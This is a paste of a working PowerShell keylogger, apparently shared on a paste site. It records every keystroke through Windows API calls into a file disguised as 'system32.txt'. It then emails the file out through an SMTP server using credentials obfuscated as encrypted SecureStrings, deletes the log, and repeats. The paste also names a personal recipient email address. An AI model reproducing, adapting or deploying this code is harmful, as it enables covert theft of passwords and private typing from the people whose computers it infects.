iL2EtqJ9

· 6 years ago · Jan 04, 2020, 07:14 AM
1$encryptU="01000000d08c9ddf0115d1118c7a00c04fc297eb01000000bccfbb297ee4734aa0aa84b8835f731e00000000020000000000106600000001000020000000526be404c8441738078e0cf380fb7789933c8c526b196d506e45d8d9937314ad000000000e8000000002000020000000c66163e7560557fe010c9666db659cb465bdb3fd16d7d881061fcba7a973f2aa7000000050646a0d9401d6aeb20d1f69e04f07fa7ab966c64dd8fd6ae9dfd399a43f1128c356524e5fea2656a3a0689c43e165d407538c86b8c447da7f7536fcad5c92958d51e1236570a14c32eb9374d063d56d336f83d702f79a3f47be5affb35a6a74c16abc8b4ecb24211e7a6631717e59d04000000020f41e3c89ea66f47b8c7a43c20aef0987e4c5b0299870ed3d9a7cd616848fd9ca35e8e3d2d692a0a89561bc43b5e85d995a4e14466ea17c184fabee6aa6a3f7"|ConvertTo-SecureString;$x="JwBJAEEATQBKAFUAUwBUAEMATwBOAEYAVQBTAEkATgBHAFkATwBVAFQASABJAFMAQQBDAEMATwBVAE4AVABJAFMATgBPAFYAQQBMAFUARQBUAE8ATQBFACcA";$strU=[Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR((($encryptU))));$From=powershell -encodedCommand $strU;$str="JwBJAEEATQBKAFUAUwBUAEMATwBOAEYAVQBTAEkATgBHAFkATwBVAFQASABJAFMAQQBDAEMATwBVAE4AVABJAFMATgBPAFYAQQBMAFUARQBUAE8ATQBFACcA";$encryptP="01000000d08c9ddf0115d1118c7a00c04fc297eb01000000bccfbb297ee4734aa0aa84b8835f731e00000000020000000000106600000001000020000000ad4e95ae89b44893d092650567aa99d5b93f46e0d197fc81fd778f3e0851a683000000000e8000000002000020000000dfab8cf8fbcb17da32577f9c8ae7e65fedf40827521c6fab71f64328867c3502700000005a412a2b152c6474f79a48ee661c9c6f02ca36108dcaa7e2c3658d080b470137a78bcd33f1e4186ecf4e14a728449974f621564a73b8f72327ad7ea05e4e4f8d3edacd6662550c6275a03086fb5e17ce42b25c2536ae8568f23333e5134ed5cb0f084183ad54d4de7b59ec88033bb8bd40000000ed1fa717926c7695f4bf4f4d5b58f453f68b7255a1765a1e655776b2ca88fa0172c1815f7eaef9fe433df874994d90f7dd9cbce530dd85f588be9d1a1e04e108"|ConvertTo-SecureString;$y="JwBUAEgASQBTAEkAUwBKAFUAUwBUAEIAVQBOAEMASABPAEYARwBJAEIAQgBFAFIASQBTAEgAJwA=";$strP=[Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR((($encryptP))));$Pass=powershell -encodedCommand $strP;$passw="JwBJAEEATQBKAFUAUwBUAEMATwBOAEYAVQBTAEkATgBHAFkATwBVAFQASABJAFMAQQBDAEMATwBVAE4AVABJAFMATgBPAFYAQQBMAFUARQBUAE8ATQBFACcA";$RunTime=2;$Init=1;$To="azhar08khan@mail.com";$Subject="System Logged of "+$env:USERNAME;$body="System Logged as of "+$StartTime;$body;$SMTPServer="smtp.mail.com";$SMTPPort="587";$credentials = new-object Management.Automation.PSCredential $From, ($Pass | ConvertTo-SecureString -AsPlainText -Force)
2#Goodluck Hacking this..!
3$MyEmailUsername = "gAAAAABeD9BGrwXuP6--F_CS7yAtgs7KDDPb0ok6geAUc2gbOME4UkwkM7iUxXb3dtsGaZK6xzUVvME51Kz1gsssPirnsX4PZg1CmBp2lwD-L-479JwECsI='123"
4$MyEmailPassword = "gAAAAABeD9C_Hndb3jDsR7HTZtwg2XS-pW9O1wkUYwLQp0MbAR9XoMCVPBG2M_dkQhjURwkSx_u94ODoAKznmbKgzWEf_pi607Ytb7Z3jrY22a6MRcA-wHs='123"
5$StartTime = Get-Date
6$EndTime = $StartTime.addminutes($Init)
7
8#requires -Version 2
9function SystemLogger($Path="C:\Users\Public\system32.txt") 
10{
11  # Signatures for API Calls
12  $signatures = @'
13[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 
14public static extern short GetAsyncKeyState(int virtualKeyCode); 
15[DllImport("user32.dll", CharSet=CharSet.Auto)]
16public static extern int GetKeyboardState(byte[] keystate);
17[DllImport("user32.dll", CharSet=CharSet.Auto)]
18public static extern int MapVirtualKey(uint uCode, int uMapType);
19[DllImport("user32.dll", CharSet=CharSet.Auto)]
20public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
21'@
22
23  # load signatures and make members available
24  $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
25    
26  # create output file
27  $null = New-Item -Path $Path -ItemType File -Force
28
29  try
30  {
31
32    # create endless loop. When user presses CTRL+C, finally-block
33    # executes and shows the collected key presses
34    $Runner = 0
35	while ($RunTime  -ge $Runner) {
36	while ($EndTime -ge $TimeNow) {
37      Start-Sleep -Milliseconds 40
38      
39      # scan all ASCII codes above 8
40      for ($ascii = 9; $ascii -le 254; $ascii++) {
41        # get current key state
42        $state = $API::GetAsyncKeyState($ascii)
43
44        # is key pressed?
45        if ($state -eq -32767) {
46          $null = [console]::CapsLock
47
48          # translate scan code to real code
49          $virtualKey = $API::MapVirtualKey($ascii, 3)
50
51          # get keyboard state for virtual keys
52          $kbstate = New-Object Byte[] 256
53          $checkkbstate = $API::GetKeyboardState($kbstate)
54
55          # prepare a StringBuilder to receive input key
56          $mychar = New-Object -TypeName System.Text.StringBuilder
57
58          # translate virtual key
59          $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
60
61          if ($success) 
62          {
63            # add key to logger file
64            [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) 
65          }
66        }
67      }
68	  $TimeNow = Get-Date
69    }
70	send-mailmessage -from $from -to $to -subject $Subject -body $body -Attachment $Path -smtpServer $smtpServer -port $SMTPPort -credential $credentials -usessl
71    Remove-Item -Path $Path -force
72	}
73  }
74  finally
75  {
76    
77    exit 1
78
79  }
80}
81
82SystemLogger